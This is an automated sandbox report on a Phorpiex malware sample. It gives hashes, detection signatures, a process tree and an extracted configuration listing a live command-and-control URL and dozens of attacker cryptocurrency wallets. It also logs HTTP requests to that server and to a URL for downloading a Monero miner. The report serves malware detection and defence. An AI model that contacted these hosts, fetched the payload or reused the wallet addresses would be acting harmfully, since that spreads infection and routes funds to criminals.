Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Id4zlrsrZ4.exe

Overview

General Information

Sample Name:Id4zlrsrZ4.exe
Analysis ID:684211
MD5:ed2d7b25bb360cccb4f0f6a4f8732d7a
SHA1:6ffcc083956c5ac19826bdd87e12f87817ee837c
SHA256:22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092
Tags:exePhorpiex
Infos:

Detection

Phorpiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Phorpiex
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Found evasive API chain (may stop execution after checking mutex)
Found strings related to Crypto-Mining
Creates HTML files with .exe extension (expired dropper behavior)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to detect sleep reduction / modifications
Contains functionality to check if Internet connection is working
Uses 32bit PE files
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • Id4zlrsrZ4.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\Id4zlrsrZ4.exe" MD5: ED2D7B25BB360CCCB4F0F6A4F8732D7A)
    • winrecsv.exe (PID: 6244 cmdline: C:\Windows\winrecsv.exe MD5: ED2D7B25BB360CCCB4F0F6A4F8732D7A)
  • winrecsv.exe (PID: 6516 cmdline: "C:\Windows\winrecsv.exe" MD5: ED2D7B25BB360CCCB4F0F6A4F8732D7A)
    • 509517324.exe (PID: 6816 cmdline: C:\Users\user~1\AppData\Local\Temp\509517324.exe MD5: A475E43527D7DC7D6F2D23BAD64FCC99)
  • cleanup
{"C2 url": "http://185.215.113.66/twizt/", "Wallet": ["12SJv5p8xUHeiKnXPCDaKCMpqvXj7TABT5BSxGt3csz9Beuc", "1A6utf8R2zfLL7X31T5QRHdQyAx16BjdFD", "3PFzu8Rw8aDNhDT6d5FMrZ3ckE4dEHzogfg", "3BJS4zYwrnfcJMm4xLxRcsa69ght8n6QWz", "lskbjrchofkmqtugfw28ot7jzv96u75xzyb5bvoop", "qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k", "XgWbWpuyPGney7hcS9vZ7eNhkj7WcvGcj8", "DPcSSyFAYLu4aEB4s1Yotb8ANwtx6bZEQG", "0xb899fC445a1b61Cdd62266795193203aa72351fE", "LRDpmP5wHZ82LZimzWDLHVqJPDSpkM1gZ7", "r1eZ7W1fmUT9tiUZwK6rr3g6RNiE4QpU1", "TBdEh7r35ywUD5omutc2kDTX7rXhnFkxy5", "t1T7mBRBgTYPEL9RPPBnAVgcftiWUPBFWyy", "terra1smy8jurjwm790qrt5z3qrsyrx9a3lcwehvzmw3", "tz1fpBZAB1jz7RsefBjT94VR3h5VzL4akg6L", "hxc65003fbd738014cf286edf92f9ddac689ec4de5", "QYHny85SWYTLcZFFNNoVovyN15eNbwZdW6", "RRQ9QGcqnHEqJAbcEjs9X3EYsEfXrZPvEi", "NC7YTU5BSOVDYRUPWA3KUXP437AEZ7JNE2H3EYGI", "AGUqhQzF52Qwbvun5wQSrpokPtCC4b9yiX", "SNCjaBTsinQUDTjBvBoDLVm2AnN2qXeMCs", "zil14rxudm29xzmu9cyk0mcwvrlxm086evuawjy2ev", "s1dSgik6QuCDrRnw9yvtrLCvRLDemi2juJe", "bitcoincash:qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k", "cosmos156h8kejuwm3n7ywpwajplfzahgum8lenvkezny", "4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK", "addr1q8ujsfumgrpjvp2v6s3cfndz7yqf7cgpnjfpdlqxfphwfa0e9qneksxrycz5e4prsnx69ugqnassr8yjzm7qvjrwun6s6dfsrt", "aPSfmf1H5DNksgcUMV39NPJcSj832L2okm", "FeGdLZrnbVLsmiY9tZ4ssoRjdLDxiigQBL", "GCVFMTUKNLFBGHE3AHRJH4IJDRZGWOJ6JD2FQTFQAAIQR64ALD7QJHUY", "GSdrN7W3GsqsxqaXg4x9k5C8cf1uJeoFFg", "bnb1rcg9mnkzna2tw4u8ughyaj6ja8feyj87hss9ky", "band1f2nuxcxahrph4n4gpy4lndsp5q342fz0yjh945", "bc1qzs2hs5dvyx04h0erq4ea72sctcre2rcwadsq2v"]}
SourceRuleDescriptionAuthorStrings
Id4zlrsrZ4.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\winrecsv.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        00000000.00000000.339631076.0000000000410000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
          00000000.00000003.345540148.0000000000733000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
            00000005.00000000.377037453.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
              00000001.00000000.345529527.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                Click to see the 5 entries
                SourceRuleDescriptionAuthorStrings
                5.0.winrecsv.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                  1.0.winrecsv.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                    0.0.Id4zlrsrZ4.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                      5.2.winrecsv.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                        1.2.winrecsv.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                          Click to see the 1 entries
                          No Sigma rule has matched
                          No Snort rule has matched

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: Id4zlrsrZ4.exeVirustotal: Detection: 70%Perma Link
                          Source: Id4zlrsrZ4.exeReversingLabs: Detection: 74%
                          Source: Id4zlrsrZ4.exeAvira: detected
                          Source: http://185.215.113.66/twizt/3StrongAvira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/984658winrecsv.exeWindowsAvira URL Cloud: Label: malware
                          Source: http://185.215.113.84/xmrminer.exeAvira URL Cloud: Label: malware
                          Source: http://185.215.113.84/xmrminer.exeBLkAvira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/1NNC:Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/3l=8Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/4lH9Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/6k8Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/Avira URL Cloud: Label: malware
                          Source: http://185.215.113.84/xmrminer.exe(Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/3lZ9Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/15C5FCA7Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/3lAvira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/6lS9Avira URL Cloud: Label: malware
                          Source: http://185.215.113.84/xmrminer.exerAvira URL Cloud: Label: malware
                          Source: http://185.215.113.84/xmrminer.exesAvira URL Cloud: Label: malware
                          Source: http://185.215.113.66/B1-4D5E-B0E7-362EE23EA443Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/5#8uAvira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/19Avira URL Cloud: Label: malware
                          Source: http://185.215.113.84/xmrminer.exe~Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/6Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/5Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/2Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/1Avira URL Cloud: Label: malware
                          Source: http://185.215.113.84/xmrminer.exero/Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/4Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/3Avira URL Cloud: Label: malware
                          Source: http://185.215.113.66/twizt/3E8Avira URL Cloud: Label: malware
                          Source: http://185.215.113.84/xmrminer.exeVirustotal: Detection: 14%Perma Link
                          Source: C:\Windows\winrecsv.exeAvira: detection malicious, Label: HEUR/AGEN.1237550
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeMetadefender: Detection: 52%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeReversingLabs: Detection: 88%
                          Source: C:\Windows\winrecsv.exeReversingLabs: Detection: 74%
                          Source: Id4zlrsrZ4.exeJoe Sandbox ML: detected
                          Source: C:\Windows\winrecsv.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeJoe Sandbox ML: detected
                          Source: 0.2.Id4zlrsrZ4.exe.400000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": "http://185.215.113.66/twizt/", "Wallet": ["12SJv5p8xUHeiKnXPCDaKCMpqvXj7TABT5BSxGt3csz9Beuc", "1A6utf8R2zfLL7X31T5QRHdQyAx16BjdFD", "3PFzu8Rw8aDNhDT6d5FMrZ3ckE4dEHzogfg", "3BJS4zYwrnfcJMm4xLxRcsa69ght8n6QWz", "lskbjrchofkmqtugfw28ot7jzv96u75xzyb5bvoop", "qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k", "XgWbWpuyPGney7hcS9vZ7eNhkj7WcvGcj8", "DPcSSyFAYLu4aEB4s1Yotb8ANwtx6bZEQG", "0xb899fC445a1b61Cdd62266795193203aa72351fE", "LRDpmP5wHZ82LZimzWDLHVqJPDSpkM1gZ7", "r1eZ7W1fmUT9tiUZwK6rr3g6RNiE4QpU1", "TBdEh7r35ywUD5omutc2kDTX7rXhnFkxy5", "t1T7mBRBgTYPEL9RPPBnAVgcftiWUPBFWyy", "terra1smy8jurjwm790qrt5z3qrsyrx9a3lcwehvzmw3", "tz1fpBZAB1jz7RsefBjT94VR3h5VzL4akg6L", "hxc65003fbd738014cf286edf92f9ddac689ec4de5", "QYHny85SWYTLcZFFNNoVovyN15eNbwZdW6", "RRQ9QGcqnHEqJAbcEjs9X3EYsEfXrZPvEi", "NC7YTU5BSOVDYRUPWA3KUXP437AEZ7JNE2H3EYGI", "AGUqhQzF52Qwbvun5wQSrpokPtCC4b9yiX", "SNCjaBTsinQUDTjBvBoDLVm2AnN2qXeMCs", "zil14rxudm29xzmu9cyk0mcwvrlxm086evuawjy2ev", "s1dSgik6QuCDrRnw9yvtrLCvRLDemi2juJe", "bitcoincash:qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k", "cosmos156h8kejuwm3n7ywpwajplfzahgum8lenvkezny", "4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK", "addr1q8ujsfumgrpjvp2v6s3cfndz7yqf7cgpnjfpdlqxfphwfa0e9qneksxrycz5e4prsnx69ugqnassr8yjzm7qvjrwun6s6dfsrt", "aPSfmf1H5DNksgcUMV39NPJcSj832L2okm", "FeGdLZrnbVLsmiY9tZ4ssoRjdLDxiigQBL", "GCVFMTUKNLFBGHE3AHRJH4IJDRZGWOJ6JD2FQTFQAAIQR64ALD7QJHUY", "GSdrN7W3GsqsxqaXg4x9k5C8cf1uJeoFFg", "bnb1rcg9mnkzna2tw4u8ughyaj6ja8feyj87hss9ky", "band1f2nuxcxahrph4n4gpy4lndsp5q342fz0yjh945", "bc1qzs2hs5dvyx04h0erq4ea72sctcre2rcwadsq2v"]}
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040AB50 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,0_2_0040AB50
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_0040AB50 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_0040AB50
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_0040AB50 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,5_2_0040AB50

                          Phishing

                          barindex
                          Source: Yara matchFile source: Id4zlrsrZ4.exe, type: SAMPLE
                          Source: Yara matchFile source: 5.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.339631076.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.345540148.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.377037453.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.345529527.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Id4zlrsrZ4.exe PID: 6224, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: winrecsv.exe PID: 6244, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: winrecsv.exe PID: 6516, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\winrecsv.exe, type: DROPPED

                          Bitcoin Miner

                          barindex
                          Source: 509517324.exeString found in binary or memory: http://185.215.113.84/xmrminer.exe
                          Source: Id4zlrsrZ4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00404A90
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_00404BD0
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00404A90
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_00404BD0
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00404A90
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00404BD0

                          Networking

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeFile created: 1840439288.exe.7.dr
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00409880 htons,socket,connect,getsockname, www.update.microsoft.com0_2_00409880
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_00409880 htons,socket,connect,getsockname, www.update.microsoft.com1_2_00409880
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_00409880 htons,socket,connect,getsockname, www.update.microsoft.com5_2_00409880
                          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                          Source: Joe Sandbox ViewIP Address: 185.215.113.84 185.215.113.84
                          Source: global trafficHTTP traffic detected: GET /twizt/1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /xmrminer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /xmrminer.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.84Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
